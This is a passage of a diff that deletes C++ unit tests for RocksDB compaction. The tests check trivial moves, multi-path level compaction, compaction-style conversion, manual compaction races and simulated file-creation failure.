-      DeleteFilesInRange(db_, db_->DefaultColumnFamily(), &begin1, &end1));
-
-  // Push data from level 0 to level 1 to force all data to be deleted
-  // Note that we don't delete level 0 files
-  compact_options.change_level = true;
-  compact_options.target_level = 1;
-  ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr));
-
-  ASSERT_OK(
-      DeleteFilesInRange(db_, db_->DefaultColumnFamily(), nullptr, nullptr));
-
-  int32_t deleted_count2 = 0;
-  for (int32_t i = 0; i < 4300; i++) {
-    ReadOptions roptions;
-    std::string result;
-    Status s = db_->Get(roptions, Key(i), &result);
-    ASSERT_TRUE(s.IsNotFound());
-    deleted_count2++;
-  }
-  ASSERT_GT(deleted_count2, deleted_count);
-  size_t new_num_files = CountFiles();
-  ASSERT_GT(old_num_files, new_num_files);
-}
-
-TEST_P(DBCompactionTestWithParam, TrivialMoveToLastLevelWithFiles) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  Random rnd(301);
-  std::vector<std::string> values;
-  // File with keys [ 0 => 99 ]
-  for (int i = 0; i < 100; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1", FilesPerLevel(0));
-  // Compaction will do L0=>L1 (trivial move) then move L1 files to L3
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 3;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,1", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  // File with keys [ 100 => 199 ]
-  for (int i = 100; i < 200; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1,0,0,1", FilesPerLevel(0));
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-  // Compaction will do L0=>L1 L1=>L2 L2=>L3 (3 trivial moves)
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,2", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 4);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  for (int i = 0; i < 200; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, LevelCompactionThirdPath) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 500 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_2", 4 * 1024 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_3", 1024 * 1024 * 1024);
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 4;
-  options.max_bytes_for_level_base = 400 * 1024;
-  options.max_subcompactions = max_subcompactions_;
-  //  options = CurrentOptions(options);
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(options.db_paths[1].path, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(options.db_paths[1].path + "/" + filenames[i]);
-  }
-  env_->DeleteDir(options.db_paths[1].path);
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are not going to second path.
-  // After that, (100K, 200K)
-  for (int num = 0; num < 3; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  // Another 110KB triggers a compaction to 400K file to fill up first path
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(3, GetSstFileCount(options.db_paths[1].path));
-
-  // (1, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4", FilesPerLevel(0));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 1)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,1", FilesPerLevel(0));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 2)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,2", FilesPerLevel(0));
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 3)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,3", FilesPerLevel(0));
-  ASSERT_EQ(3, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,4", FilesPerLevel(0));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 5)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,5", FilesPerLevel(0));
-  ASSERT_EQ(5, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 6)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,6", FilesPerLevel(0));
-  ASSERT_EQ(6, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 7)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,7", FilesPerLevel(0));
-  ASSERT_EQ(7, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,8", FilesPerLevel(0));
-  ASSERT_EQ(8, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_P(DBCompactionTestWithParam, LevelCompactionPathUse) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 500 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_2", 4 * 1024 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_3", 1024 * 1024 * 1024);
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 4;
-  options.max_bytes_for_level_base = 400 * 1024;
-  options.max_subcompactions = max_subcompactions_;
-  //  options = CurrentOptions(options);
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(options.db_paths[1].path, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(options.db_paths[1].path + "/" + filenames[i]);
-  }
-  env_->DeleteDir(options.db_paths[1].path);
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // Always gets compacted into 1 Level1 file,
-  // 0/1 Level 0 file
-  for (int num = 0; num < 3; num++) {
-    key_idx = 0;
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_P(DBCompactionTestWithParam, ConvertCompactionStyle) {
-  Random rnd(301);
-  int max_key_level_insert = 200;
-  int max_key_universal_insert = 600;
-
-  // Stage 1: generate a db with level compaction
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.num_levels = 4;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_bytes_for_level_base = 500 << 10;  // 500KB
-  options.max_bytes_for_level_multiplier = 1;
-  options.target_file_size_base = 200 << 10;  // 200KB
-  options.target_file_size_multiplier = 1;
-  options.max_subcompactions = max_subcompactions_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  for (int i = 0; i <= max_key_level_insert; i++) {
-    // each value is 10K
-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-  }
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(TotalTableFiles(1, 4), 1);
-  int non_level0_num_files = 0;
-  for (int i = 1; i < options.num_levels; i++) {
-    non_level0_num_files += NumTableFilesAtLevel(i, 1);
-  }
-  ASSERT_GT(non_level0_num_files, 0);
-
-  // Stage 2: reopen with universal compaction - should fail
-  options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 1;
-  options = CurrentOptions(options);
-  Status s = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(s.IsInvalidArgument());
-
-  // Stage 3: compact into a single file and move the file to level 0
-  options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.target_file_size_base = INT_MAX;
-  options.target_file_size_multiplier = 1;
-  options.max_bytes_for_level_base = INT_MAX;
-  options.max_bytes_for_level_multiplier = 1;
-  options.num_levels = 4;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 0;
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kForce;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  dbfull()->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-
-  // Only 1 file in L0
-  ASSERT_EQ("1", FilesPerLevel(1));
-
-  // Stage 4: re-open in universal compaction style and do some db operations
-  options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 4;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 3;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  options.num_levels = 1;
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  for (int i = max_key_level_insert / 2; i <= max_key_universal_insert; i++) {
-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-  }
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  for (int i = 1; i < options.num_levels; i++) {
-    ASSERT_EQ(NumTableFilesAtLevel(i, 1), 0);
-  }
-
-  // verify keys inserted in both level compaction style and universal
-  // compaction style
-  std::string keys_in_db;
-  Iterator* iter = dbfull()->NewIterator(ReadOptions(), handles_[1]);
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    keys_in_db.append(iter->key().ToString());
-    keys_in_db.push_back(',');
-  }
-  delete iter;
-
-  std::string expected_keys;
-  for (int i = 0; i <= max_key_universal_insert; i++) {
-    expected_keys.append(Key(i));
-    expected_keys.push_back(',');
-  }
-
-  ASSERT_EQ(keys_in_db, expected_keys);
-}
-
-TEST_F(DBCompactionTest, L0_CompactionBug_Issue44_a) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "b", "v"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_OK(Delete(1, "b"));
-    ASSERT_OK(Delete(1, "a"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_OK(Delete(1, "a"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "a", "v"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("(a->v)", Contents(1));
-    env_->SleepForMicroseconds(1000000);  // Wait for compaction to finish
-    ASSERT_EQ("(a->v)", Contents(1));
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBCompactionTest, L0_CompactionBug_Issue44_b) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    Put(1, "", "");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Delete(1, "e");
-    Put(1, "", "");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "c", "cv");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "", "");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "", "");
-    env_->SleepForMicroseconds(1000000);  // Wait for compaction to finish
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "d", "dv");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "", "");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Delete(1, "d");
-    Delete(1, "b");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("(->)(c->cv)", Contents(1));
-    env_->SleepForMicroseconds(1000000);  // Wait for compaction to finish
-    ASSERT_EQ("(->)(c->cv)", Contents(1));
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBCompactionTest, ManualAutoRace) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::BGWorkCompaction", "DBCompactionTest::ManualAutoRace:1"},
-       {"DBImpl::RunManualCompaction:WaitScheduled",
-        "BackgroundCallCompaction:0"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Put(1, "foo", "");
-  Put(1, "bar", "");
-  Flush(1);
-  Put(1, "foo", "");
-  Put(1, "bar", "");
-  // Generate four files in CF 0, which should trigger an auto compaction
-  Put("foo", "");
-  Put("bar", "");
-  Flush();
-  Put("foo", "");
-  Put("bar", "");
-  Flush();
-  Put("foo", "");
-  Put("bar", "");
-  Flush();
-  Put("foo", "");
-  Put("bar", "");
-  Flush();
-
-  // The auto compaction is scheduled but waited until here
-  TEST_SYNC_POINT("DBCompactionTest::ManualAutoRace:1");
-  // The auto compaction will wait until the manual compaction is registerd
-  // before processing so that it will be cancelled.
-  dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr, nullptr);
-  ASSERT_EQ("0,1", FilesPerLevel(1));
-
-  // Eventually the cancelled compaction will be rescheduled and executed.
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, ManualCompaction) {
-  Options options = CurrentOptions();
-  options.max_subcompactions = max_subcompactions_;
-  options.statistics = rocksdb::CreateDBStatistics();
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // iter - 0 with 7 levels
-  // iter - 1 with 3 levels
-  for (int iter = 0; iter < 2; ++iter) {
-    MakeTables(3, "p", "q", 1);
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range falls before files
-    Compact(1, "", "c");
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range falls after files
-    Compact(1, "r", "z");
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range overlaps files
-    Compact(1, "p1", "p9");
-    ASSERT_EQ("0,0,1", FilesPerLevel(1));
-
-    // Populate a different range
-    MakeTables(3, "c", "e", 1);
-    ASSERT_EQ("1,1,2", FilesPerLevel(1));
-
-    // Compact just the new range
-    Compact(1, "b", "f");
-    ASSERT_EQ("0,0,2", FilesPerLevel(1));
-
-    // Compact all
-    MakeTables(1, "a", "z", 1);
-    ASSERT_EQ("1,0,2", FilesPerLevel(1));
-
-    uint64_t prev_block_cache_add =
-        options.statistics->getTickerCount(BLOCK_CACHE_ADD);
-    CompactRangeOptions cro;
-    cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-    db_->CompactRange(cro, handles_[1], nullptr, nullptr);
-    // Verify manual compaction doesn't fill block cache
-    ASSERT_EQ(prev_block_cache_add,
-              options.statistics->getTickerCount(BLOCK_CACHE_ADD));
-
-    ASSERT_EQ("0,0,1", FilesPerLevel(1));
-
-    if (iter == 0) {
-      options = CurrentOptions();
-      options.num_levels = 3;
-      options.create_if_missing = true;
-      options.statistics = rocksdb::CreateDBStatistics();
-      DestroyAndReopen(options);
-      CreateAndReopenWithCF({"pikachu"}, options);
-    }
-  }
-}
-
-
-TEST_P(DBCompactionTestWithParam, ManualLevelCompactionOutputPathId) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_ + "_2", 2 * 10485760);
-  options.db_paths.emplace_back(dbname_ + "_3", 100 * 10485760);
-  options.db_paths.emplace_back(dbname_ + "_4", 120 * 10485760);
-  options.max_subcompactions = max_subcompactions_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // iter - 0 with 7 levels
-  // iter - 1 with 3 levels
-  for (int iter = 0; iter < 2; ++iter) {
-    for (int i = 0; i < 3; ++i) {
-      ASSERT_OK(Put(1, "p", "begin"));
-      ASSERT_OK(Put(1, "q", "end"));
-      ASSERT_OK(Flush(1));
-    }
-    ASSERT_EQ("3", FilesPerLevel(1));
-    ASSERT_EQ(3, GetSstFileCount(options.db_paths[0].path));
-    ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-    // Compaction range falls before files
-    Compact(1, "", "c");
-    ASSERT_EQ("3", FilesPerLevel(1));
-
-    // Compaction range falls after files
-    Compact(1, "r", "z");
-    ASSERT_EQ("3", FilesPerLevel(1));
-
-    // Compaction range overlaps files
-    Compact(1, "p1", "p9", 1);
-    ASSERT_EQ("0,1", FilesPerLevel(1));
-    ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-    ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-    ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-    // Populate a different range
-    for (int i = 0; i < 3; ++i) {
-      ASSERT_OK(Put(1, "c", "begin"));
-      ASSERT_OK(Put(1, "e", "end"));
-      ASSERT_OK(Flush(1));
-    }
-    ASSERT_EQ("3,1", FilesPerLevel(1));
-
-    // Compact just the new range
-    Compact(1, "b", "f", 1);
-    ASSERT_EQ("0,2", FilesPerLevel(1));
-    ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-    ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-    ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-    // Compact all
-    ASSERT_OK(Put(1, "a", "begin"));
-    ASSERT_OK(Put(1, "z", "end"));
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ("1,2", FilesPerLevel(1));
-    ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-    ASSERT_EQ(1, GetSstFileCount(options.db_paths[0].path));
-    CompactRangeOptions compact_options;
-    compact_options.target_path_id = 1;
-    compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-    db_->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-
-    ASSERT_EQ("0,1", FilesPerLevel(1));
-    ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-    ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-    ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-    if (iter == 0) {
-      DestroyAndReopen(options);
-      options = CurrentOptions();
-      options.db_paths.emplace_back(dbname_ + "_2", 2 * 10485760);
-      options.db_paths.emplace_back(dbname_ + "_3", 100 * 10485760);
-      options.db_paths.emplace_back(dbname_ + "_4", 120 * 10485760);
-      options.max_background_flushes = 1;
-      options.num_levels = 3;
-      options.create_if_missing = true;
-      CreateAndReopenWithCF({"pikachu"}, options);
-    }
-  }
-}
-
-TEST_F(DBCompactionTest, FilesDeletedAfterCompaction) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v2"));
-    Compact(1, "a", "z");
-    const size_t num_files = CountLiveFiles();
-    for (int i = 0; i < 10; i++) {
-      ASSERT_OK(Put(1, "foo", "v2"));
-      Compact(1, "a", "z");
-    }
-    ASSERT_EQ(CountLiveFiles(), num_files);
-  } while (ChangeCompactOptions());
-}
-
-// Check level comapction with compact files
-TEST_P(DBCompactionTestWithParam, DISABLED_CompactFilesOnLevelCompaction) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 100;
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base = options.target_file_size_base * 2;
-  options.level0_stop_writes_trigger = 2;
-  options.max_bytes_for_level_multiplier = 2;
-  options.compression = kNoCompression;
-  options.max_subcompactions = max_subcompactions_;
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Random rnd(301);
-  for (int key = 64 * kEntriesPerBuffer; key >= 0; --key) {
-    ASSERT_OK(Put(1, ToString(key), RandomString(&rnd, kTestValueSize)));
-  }
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-  dbfull()->TEST_WaitForCompact();
-
-  ColumnFamilyMetaData cf_meta;
-  dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  int output_level = static_cast<int>(cf_meta.levels.size()) - 1;
-  for (int file_picked = 5; file_picked > 0; --file_picked) {
-    std::set<std::string> overlapping_file_names;
-    std::vector<std::string> compaction_input_file_names;
-    for (int f = 0; f < file_picked; ++f) {
-      int level = 0;
-      auto file_meta = PickFileRandomly(cf_meta, &rnd, &level);
-      compaction_input_file_names.push_back(file_meta->name);
-      GetOverlappingFileNumbersForLevelCompaction(
-          cf_meta, options.comparator, level, output_level,
-          file_meta, &overlapping_file_names);
-    }
-
-    ASSERT_OK(dbfull()->CompactFiles(
-        CompactionOptions(), handles_[1],
-        compaction_input_file_names,
-        output_level));
-
-    // Make sure all overlapping files do not exist after compaction
-    dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-    VerifyCompactionResult(cf_meta, overlapping_file_names);
-  }
-
-  // make sure all key-values are still there.
-  for (int key = 64 * kEntriesPerBuffer; key >= 0; --key) {
-    ASSERT_NE(Get(1, ToString(key)), "NOT_FOUND");
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, PartialCompactionFailure) {
-  Options options;
-  const int kKeySize = 16;
-  const int kKvSize = 1000;
-  const int kKeysPerBuffer = 100;
-  const int kNumL1Files = 5;
-  options.create_if_missing = true;
-  options.write_buffer_size = kKeysPerBuffer * kKvSize;
-  options.max_write_buffer_number = 2;
-  options.target_file_size_base =
-      options.write_buffer_size *
-      (options.max_write_buffer_number - 1);
-  options.level0_file_num_compaction_trigger = kNumL1Files;
-  options.max_bytes_for_level_base =
-      options.level0_file_num_compaction_trigger *
-      options.target_file_size_base;
-  options.max_bytes_for_level_multiplier = 2;
-  options.compression = kNoCompression;
-  options.max_subcompactions = max_subcompactions_;
-
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  env_->SetBackgroundThreads(1, Env::LOW);
-  // stop the compaction thread until we simulate the file creation failure.
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  options.env = env_;
-
-  DestroyAndReopen(options);
-
-  const int kNumInsertedKeys =
-      options.level0_file_num_compaction_trigger *
-      (options.max_write_buffer_number - 1) *
-      kKeysPerBuffer;
-
-  Random rnd(301);
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  for (int k = 0; k < kNumInsertedKeys; ++k) {
-    keys.emplace_back(RandomString(&rnd, kKeySize));
-    values.emplace_back(RandomString(&rnd, kKvSize - kKeySize));
-    ASSERT_OK(Put(Slice(keys[k]), Slice(values[k])));
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-
-  dbfull()->TEST_FlushMemTable(true);
-  // Make sure the number of L0 files can trigger compaction.
-  ASSERT_GE(NumTableFilesAtLevel(0),
-            options.level0_file_num_compaction_trigger);
-
-  auto previous_num_level0_files = NumTableFilesAtLevel(0);
-
-  // Fail the first file creation.
-  env_->non_writable_count_ = 1;
-  sleeping_task_low.WakeUp();
